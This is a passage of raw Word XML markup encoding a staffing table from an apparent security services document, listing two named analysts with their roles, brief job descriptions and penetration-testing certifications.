            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="0DA52885" w14:textId="6FBD68B1" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00D377F0">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sidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F41C64" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Role </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3035" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="14103F73" w14:textId="7E82AC54" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00D377F0">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sidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F41C64" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="4E5EDD0B" w14:textId="0793ED1F" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="00F41C64" w:rsidP="00D377F0">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sidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>License / Certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F41C64" w14:paraId="215B76FD" w14:textId="77777777" w:rsidTr="00AD3007">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="3320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9C2F2B" w14:textId="1D26020B" w:rsidR="00C96A1B" w:rsidRPr="00ED22DE" w:rsidRDefault="005473FC" w:rsidP="005473FC">
            <w:pPr>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C96A1B" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Amr Samer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="24CA3C12" w14:textId="05D9BDC1" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="005473FC" w:rsidP="005473FC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">App Security </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3035" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="7D6F41E5" w14:textId="62DB3BF4" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="005407CE" w:rsidP="00647F09">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ED22DE">
              <w:t>APP S</w:t>
            </w:r>
            <w:r w:rsidR="00647F09" w:rsidRPr="00ED22DE">
              <w:t xml:space="preserve">ecurity analyst </w:t>
            </w:r>
            <w:r w:rsidR="004510FF" w:rsidRPr="00ED22DE">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00647F09" w:rsidRPr="00ED22DE">
              <w:t>with over 10 years of experience in various technical fields, including database design, field device support, help desk, IT asset management, programming, and information security. His primary duties include conducting network vulnerability assessments, penetration tests, web application assessments, firewall configuration audits, wireless assessments, and social engineering engagements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="166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A1C0178" w14:textId="77777777" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="00F41C64" w:rsidP="00D377F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00"/>
            </w:tblGrid>
            <w:tr w:rsidR="00ED2494" w:rsidRPr="00ED2494" w14:paraId="4A2604C1" w14:textId="77777777" w:rsidTr="00AD3007">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
                <w:jc w:val="center"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="42B5957E" w14:textId="2C893FBA" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:br/>
                  </w:r>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:br/>
                    <w:t>OSCP</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5AEFFC5D" w14:textId="18864B78" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>OSEP</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6323AA7D" w14:textId="69515459" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>OSWE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3F36D1E1" w14:textId="24451D1F" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>eCPPT</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="271BE25E" w14:textId="7729A5B9" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>CRTP</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6CB09D99" w14:textId="25681D5B" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>CRTE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="53167902" w14:textId="77777777" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>GPEN</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2FCF98CF" w14:textId="7ED2A0EF" w:rsidR="00ED2494" w:rsidRPr="00ED2494" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00ED22DE">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>GWPT</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2F914BDD" w14:textId="77777777" w:rsidR="00ED2494" w:rsidRPr="00ED2494" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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2494" w:rsidRPr="00ED2494" w14:paraId="5B6D0D52" w14:textId="77777777" w:rsidTr="00ED2494">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="74181867" w14:textId="77777777" w:rsidR="00ED2494" w:rsidRPr="00ED2494" w:rsidRDefault="00ED2494" w:rsidP="00ED2494">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="303FF9B6" w14:textId="77777777" w:rsidR="00ED2494" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED2494" w:rsidP="00ED249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5407CE" w14:paraId="55E35CF3" w14:textId="77777777" w:rsidTr="00AD3007">
        <w:trPr>
          <w:trHeight w:val="3410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2350" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11991D01" w14:textId="0F7E1865" w:rsidR="005407CE" w:rsidRPr="00ED22DE" w:rsidRDefault="005407CE" w:rsidP="005407CE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br/>
              <w:t>Karim Saeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="39FA66F6" w14:textId="6E556614" w:rsidR="005407CE" w:rsidRPr="00ED22DE" w:rsidRDefault="005407CE" w:rsidP="005407CE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Source Code </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="0E988E53" w14:textId="60A2DBE8" w:rsidR="007562F5" w:rsidRPr="007562F5" w:rsidRDefault="004510FF" w:rsidP="004510FF">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:t xml:space="preserve">Source Code Review </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED22DE">
              <w:br/>
              <w:t>With over 10 years in technical roles, including software development and cybersecurity, the Source Code Review Security Engineer focuses on identifying and addressing security vulnerabilities in source code. Responsibilities include conducting detailed code reviews, utilizing static and dynamic analysis tools, and working with development teams to ensure secure coding practices and effective remediation strategies</w:t>
            </w:r>
            <w:r w:rsidR="007562F5" w:rsidRPr="007562F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564CBCAA" w14:textId="4154D4BD" w:rsidR="005407CE" w:rsidRPr="00ED22DE" w:rsidRDefault="005407CE" w:rsidP="007562F5">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BFD5A4E" w14:textId="5610B8EF" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="00AD3007" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0051706C" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0051706C" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0051706C" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OSCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="417E5C65" w14:textId="77777777" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="00AD3007" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OSEP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27AB647C" w14:textId="3ABC7588" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="0051706C" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AD3007" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OSWE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753AC20F" w14:textId="70CD8859" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="0051706C" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AD3007" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>eCPPT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6A33B18F" w14:textId="77777777" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="00AD3007" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CRTP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2F9B61" w14:textId="77777777" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="00AD3007" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CRTE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2968CFAD" w14:textId="224CEA62" w:rsidR="00AD3007" w:rsidRPr="00ED22DE" w:rsidRDefault="00AD3007" w:rsidP="00AD3007">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GPEN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B933465" w14:textId="7BC86C7E" w:rsidR="005407CE" w:rsidRPr="00ED22DE" w:rsidRDefault="0051706C" w:rsidP="00AD3007">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ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AD3007" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GWPT</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="732" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="732"/>
            </w:tblGrid>
            <w:tr w:rsidR="005407CE" w:rsidRPr="00ED2494" w14:paraId="7611ACBE" w14:textId="77777777" w:rsidTr="00AD3007">
              <w:trPr>
                <w:trHeight w:val="1407"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="155B9938" w14:textId="4559F018" w:rsidR="005407CE" w:rsidRPr="00ED2494" w:rsidRDefault="005407CE" w:rsidP="00AD3007">
                  <w:pPr>
                    <w:spacing w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="58EEA2AB" w14:textId="77777777" w:rsidR="005407CE" w:rsidRPr="00ED22DE" w:rsidRDefault="005407CE" w:rsidP="00AD300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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="634F7784" w14:textId="77777777" w:rsidR="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00944C9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE32124" w14:textId="77777777" w:rsidR="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00944C9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A62F048" w14:textId="77777777" w:rsidR="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00944C9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7406BBCE" w14:textId="6F9259C0" w:rsidR="007E49B6" w:rsidRDefault="004518B1" w:rsidP="00B00916">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
